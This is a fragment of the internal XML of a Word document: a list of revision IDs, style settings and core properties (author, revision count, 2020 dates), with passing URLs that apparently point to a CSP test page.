    <w:rsid w:val="005E2865"/>
    <w:rsid w:val="005E38AE"/>
    <w:rsid w:val="005E67DD"/>
    <w:rsid w:val="005E7DF7"/>
    <w:rsid w:val="005F5551"/>
    <w:rsid w:val="00621E94"/>
    <w:rsid w:val="00625A52"/>
    <w:rsid w:val="00626440"/>
    <w:rsid w:val="00647D89"/>
    <w:rsid w:val="00686462"/>
    <w:rsid w:val="00687093"/>
    <w:rsid w:val="00695422"/>
    <w:rsid w:val="006D5568"/>
    <w:rsid w:val="006D5B24"/>
    <w:rsid w:val="006E0E67"/>
    <w:rsid w:val="006E220D"/>
    <w:rsid w:val="006E6DD3"/>
    <w:rsid w:val="006F419D"/>
    <w:rsid w:val="006F59C3"/>
    <w:rsid w:val="00702C93"/>
    <w:rsid w:val="00703FD6"/>
    <w:rsid w:val="00710429"/>
    <w:rsid w:val="00725D6A"/>
    <w:rsid w:val="007347E2"/>
    <w:rsid w:val="007452D3"/>
    <w:rsid w:val="00781151"/>
    <w:rsid w:val="00785A55"/>
    <w:rsid w:val="007A0B22"/>
    <w:rsid w:val="007B6C75"/>
    <w:rsid w:val="007D05C6"/>
    <w:rsid w:val="007F276A"/>
    <w:rsid w:val="007F6B26"/>
    <w:rsid w:val="008040FA"/>
    <w:rsid w:val="00852DD4"/>
    <w:rsid w:val="008573E7"/>
    <w:rsid w:val="00871901"/>
    <w:rsid w:val="008A5C55"/>
    <w:rsid w:val="008A682F"/>
    <w:rsid w:val="008C7292"/>
    <w:rsid w:val="008E14C8"/>
    <w:rsid w:val="008E1A7F"/>
    <w:rsid w:val="00914017"/>
    <w:rsid w:val="00932656"/>
    <w:rsid w:val="00947406"/>
    <w:rsid w:val="009A4604"/>
    <w:rsid w:val="009C2FE0"/>
    <w:rsid w:val="009D134D"/>
    <w:rsid w:val="009D1D56"/>
    <w:rsid w:val="00A06102"/>
    <w:rsid w:val="00A15395"/>
    <w:rsid w:val="00A15EB9"/>
    <w:rsid w:val="00A20FF4"/>
    <w:rsid w:val="00A258BE"/>
    <w:rsid w:val="00A312BA"/>
    <w:rsid w:val="00A41EE5"/>
    <w:rsid w:val="00A44C1C"/>
    <w:rsid w:val="00A557DC"/>
    <w:rsid w:val="00A56584"/>
    <w:rsid w:val="00A80300"/>
    <w:rsid w:val="00A8520A"/>
    <w:rsid w:val="00AD4077"/>
    <w:rsid w:val="00AE3D06"/>
    <w:rsid w:val="00B00CD7"/>
    <w:rsid w:val="00B27EE8"/>
    <w:rsid w:val="00B31041"/>
    <w:rsid w:val="00B56BF1"/>
    <w:rsid w:val="00B6501C"/>
    <w:rsid w:val="00B724E9"/>
    <w:rsid w:val="00B7290E"/>
    <w:rsid w:val="00BA25AC"/>
    <w:rsid w:val="00BC3F41"/>
    <w:rsid w:val="00BC4177"/>
    <w:rsid w:val="00BD0885"/>
    <w:rsid w:val="00BD71C6"/>
    <w:rsid w:val="00BF29B5"/>
    <w:rsid w:val="00C050A7"/>
    <w:rsid w:val="00C537AD"/>
    <w:rsid w:val="00C57DF7"/>
    <w:rsid w:val="00C77D10"/>
    <w:rsid w:val="00CA5E16"/>
    <w:rsid w:val="00CA7A48"/>
    <w:rsid w:val="00CD5A56"/>
    <w:rsid w:val="00CD7A8F"/>
    <w:rsid w:val="00CF42BD"/>
    <w:rsid w:val="00D05069"/>
    <w:rsid w:val="00D15BA8"/>
    <w:rsid w:val="00D217D3"/>
    <w:rsid w:val="00D25ABB"/>
    <w:rsid w:val="00D30DBF"/>
    <w:rsid w:val="00D3117A"/>
    <w:rsid w:val="00D53584"/>
    <w:rsid w:val="00D732E5"/>
    <w:rsid w:val="00D83676"/>
    <w:rsid w:val="00D86FCD"/>
    <w:rsid w:val="00DA14A9"/>
    <w:rsid w:val="00DB000D"/>
    <w:rsid w:val="00DC0726"/>
    <w:rsid w:val="00DD4B08"/>
    <w:rsid w:val="00DD7F55"/>
    <w:rsid w:val="00DF624C"/>
    <w:rsid w:val="00DF676C"/>
    <w:rsid w:val="00E23FF0"/>
    <w:rsid w:val="00E61B2C"/>
    <w:rsid w:val="00E67032"/>
    <w:rsid w:val="00E76AB4"/>
    <w:rsid w:val="00E82015"/>
    <w:rsid w:val="00EC76BA"/>
    <w:rsid w:val="00ED1E8A"/>
    <w:rsid w:val="00ED34E2"/>
    <w:rsid w:val="00F012A6"/>
    <w:rsid w:val="00F027EC"/>
    <w:rsid w:val="00F13A19"/>
    <w:rsid w:val="00F213C7"/>
    <w:rsid w:val="00F274E1"/>
    <w:rsid w:val="00F359C6"/>
    <w:rsid w:val="00F61BD6"/>
    <w:rsid w:val="00F63696"/>
    <w:rsid w:val="00F8401B"/>
    <w:rsid w:val="00F97DB4"/>
    <w:rsid w:val="00FA713A"/>
    <w:rsid w:val="00FB0166"/>
    <w:rsid w:val="00FD4A60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E406"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0CBB2DA5-302D-49CE-8D93-0576746C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15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0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82015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82015"/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unhideWhenUsed/>
    <w:rsid w:val="00104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40B5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4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40B5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman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625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5A5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A4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A445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example79.com:8000/csptest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example32.com:8000/csptes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example79.com:8000/csptest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example68.com:8000/csptes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9A56-84FF-4736-B91F-19E5C6E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0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珂阳</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>强 珂阳</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-01T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-18T10:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>